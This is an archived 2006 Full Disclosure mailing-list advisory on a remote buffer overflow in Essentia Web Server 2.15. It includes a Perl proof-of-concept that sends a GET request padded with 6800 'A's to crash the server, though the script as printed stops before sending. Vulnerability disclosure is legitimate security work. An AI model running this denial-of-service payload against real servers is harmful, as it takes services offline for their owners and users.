Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: [x0n3-h4ck.org] Essentia Web Server 2.15 Buffer Overflow

[x0n3-h4ck.org] Essentia Web Server 2.15 Buffer Overflow

From: <corrado.liotta_at_alice.it>
Date: Sat, 4 Nov 2006 19:12:13 +0100

-=[--------------------ADVISORY-------------------]=-

                  Essentia Web Server V 2.15

             Author:CorryL x0n3-h4ck.org
-=[----------------------------------------------------]=-

-=[+] Application: Essentia Web Server
-=[+] Version: 2.15
-=[+] Vendor's URL: http://www.essencomp.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL

..::[ Descriprion ]::..

Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.

..::[ Bug ]::..

This software is affection from a buffer overflow
what it would allow an attacker to perform arbitrary code
on the system victim.
Sending a GET+Ax6800 request, he would succeed
to write above the seh point.

..::[ Proof Of Concept ]::..

#!/usr/bin/perl

use IO::Socket;

use Getopt::Std; getopts('h:', \%args);

if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL corryl80_at_gmail.com ]=-\n";

print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

Usage();

}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";

..::[ Workaround ]::..

nothing

..::[ Disclousure Timeline ]::..

[30/10/2006] - Vendor notification
[04/11/2006] – No Vendor Response
[04/11/2006] - Public disclousure

*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Nov 04 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos